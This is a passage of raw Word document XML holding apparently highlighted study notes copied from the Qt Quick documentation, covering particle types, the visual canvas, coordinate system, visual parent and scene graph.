                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1887" w:history="1">
              <w:bookmarkStart w:id="1488" w:name="_Toc483000852"/>
              <w:bookmarkStart w:id="1489" w:name="_Toc483003845"/>
              <w:bookmarkStart w:id="1490" w:name="_Toc483604198"/>
              <w:bookmarkStart w:id="1491" w:name="_Toc483605418"/>
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="20"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:b w:val="0"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>Particle</w:t>
              </w:r>
              <w:bookmarkEnd w:id="1488"/>
              <w:bookmarkEnd w:id="1489"/>
              <w:bookmarkEnd w:id="1490"/>
              <w:bookmarkEnd w:id="1491"/>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r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Represents particles manipulated by emitters and affectors</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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B55535" w:rsidRPr="002230B8" w:rsidTr="00B55535">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702"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490E7E" w:rsidP="00B55535">
            <w:pPr>
              <w:spacing w:after="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1888" w:history="1">
              <w:bookmarkStart w:id="1492" w:name="_Toc483000853"/>
              <w:bookmarkStart w:id="1493" w:name="_Toc483003846"/>
              <w:bookmarkStart w:id="1494" w:name="_Toc483604199"/>
              <w:bookmarkStart w:id="1495" w:name="_Toc483605419"/>
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="20"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:b w:val="0"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>Wander</w:t>
              </w:r>
              <w:bookmarkEnd w:id="1492"/>
              <w:bookmarkEnd w:id="1493"/>
              <w:bookmarkEnd w:id="1494"/>
              <w:bookmarkEnd w:id="1495"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>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r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>For applying random particle trajectory</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B55535" w:rsidRPr="00B55535" w:rsidRDefault="00B55535" w:rsidP="00B55535">
            <w:pPr>
              <w:spacing w:after="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="000437DC" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1889" w:history="1">
        <w:r w:rsidR="00B55535" w:rsidRPr="0090003B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-visualcanvas-topic.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B55535" w:rsidRPr="00B55535" w:rsidRDefault="00B55535" w:rsidP="00BA1CDE">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1496" w:name="_Toc483000854"/>
      <w:bookmarkStart w:id="1497" w:name="_Toc483003847"/>
      <w:bookmarkStart w:id="1498" w:name="_Toc483604200"/>
      <w:bookmarkStart w:id="1499" w:name="_Toc483605420"/>
      <w:r w:rsidRPr="00BA1CDE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Important Concepts In Qt Quick - The Visual Canvas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1496"/>
      <w:bookmarkEnd w:id="1497"/>
      <w:bookmarkEnd w:id="1498"/>
      <w:bookmarkEnd w:id="1499"/>
    </w:p>
    <w:p w:rsidR="00B55535" w:rsidRPr="00B55535" w:rsidRDefault="00B55535" w:rsidP="00B55535">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The visual canvas provided by the Qt Quick is a </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>two dimensional canvas with z-ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B55535" w:rsidRPr="00B55535" w:rsidRDefault="00B55535" w:rsidP="00BA1CDE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1500" w:name="coordinate-system"/>
      <w:bookmarkStart w:id="1501" w:name="_Toc483000855"/>
      <w:bookmarkStart w:id="1502" w:name="_Toc483003848"/>
      <w:bookmarkStart w:id="1503" w:name="_Toc483604201"/>
      <w:bookmarkStart w:id="1504" w:name="_Toc483605421"/>
      <w:bookmarkEnd w:id="1500"/>
      <w:r w:rsidRPr="00BA1CDE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Coordinate System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1501"/>
      <w:bookmarkEnd w:id="1502"/>
      <w:bookmarkEnd w:id="1503"/>
      <w:bookmarkEnd w:id="1504"/>
    </w:p>
    <w:p w:rsidR="00B55535" w:rsidRPr="00B55535" w:rsidRDefault="00B55535" w:rsidP="00B55535">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>top-left pixel</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the Qt Quick coordinate system is the </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[0, 0] pixel</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The coordinate system of a </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>child item is relative to its visual parent</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> item. See the documentation on the</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1890" w:history="1">
        <w:r w:rsidRPr="00B55535">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Coordinate System</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for in-depth information about the coordinate system utilized by Qt Quick.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B55535" w:rsidRPr="002E1325" w:rsidRDefault="00B55535" w:rsidP="00BA1CDE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1505" w:name="visual-parent"/>
      <w:bookmarkStart w:id="1506" w:name="_Toc483000856"/>
      <w:bookmarkStart w:id="1507" w:name="_Toc483003849"/>
      <w:bookmarkStart w:id="1508" w:name="_Toc483604202"/>
      <w:bookmarkStart w:id="1509" w:name="_Toc483605422"/>
      <w:bookmarkEnd w:id="1505"/>
      <w:r w:rsidRPr="00BA1CDE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Visual Parent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1506"/>
      <w:bookmarkEnd w:id="1507"/>
      <w:bookmarkEnd w:id="1508"/>
      <w:bookmarkEnd w:id="1509"/>
    </w:p>
    <w:p w:rsidR="00B55535" w:rsidRPr="00B55535" w:rsidRDefault="00B55535" w:rsidP="00B55535">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">There are </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>two separate kinds of parenting</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a QML application which uses </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The first kind is the </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ownership-parent</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (also known as the</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1891" w:history="1">
        <w:r w:rsidRPr="00B55535">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">parent) which determines </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object lifetime semantics</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The second kind is the </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>visual parent</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which determines where on the </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>canvas an item is drawn</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and also certain properties (for example, opacity applies to visual children).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B55535" w:rsidRPr="00B55535" w:rsidRDefault="00B55535" w:rsidP="00B55535">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>almost all cases, the visual parent is identical to the ownership-parent</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. See the documentation about the</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1892" w:history="1">
        <w:r w:rsidRPr="00B55535">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Visual Parent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more in-depth information on the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B55535" w:rsidRPr="00B55535" w:rsidRDefault="00B55535" w:rsidP="00BA1CDE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1510" w:name="scene-graph"/>
      <w:bookmarkStart w:id="1511" w:name="_Toc483000857"/>
      <w:bookmarkStart w:id="1512" w:name="_Toc483003850"/>
      <w:bookmarkStart w:id="1513" w:name="_Toc483604203"/>
      <w:bookmarkStart w:id="1514" w:name="_Toc483605423"/>
      <w:bookmarkEnd w:id="1510"/>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scene Graph</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1511"/>
      <w:bookmarkEnd w:id="1512"/>
      <w:bookmarkEnd w:id="1513"/>
      <w:bookmarkEnd w:id="1514"/>
    </w:p>
    <w:p w:rsidR="00B55535" w:rsidRPr="00B55535" w:rsidRDefault="00B55535" w:rsidP="00B55535">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Modern computer systems and devices use </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>graphics processing units or GPUs</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to render graphics. </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick can leverage this</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> graphics hardware by using graphics APIs like </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenGL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> graphics adpatation for Qt Quick requires </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenGL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and it is used to display applications developed with Qt Quick in QML. In particular, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1CDE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick defines a scene graph which is then rendered</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. See the documentation about the</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
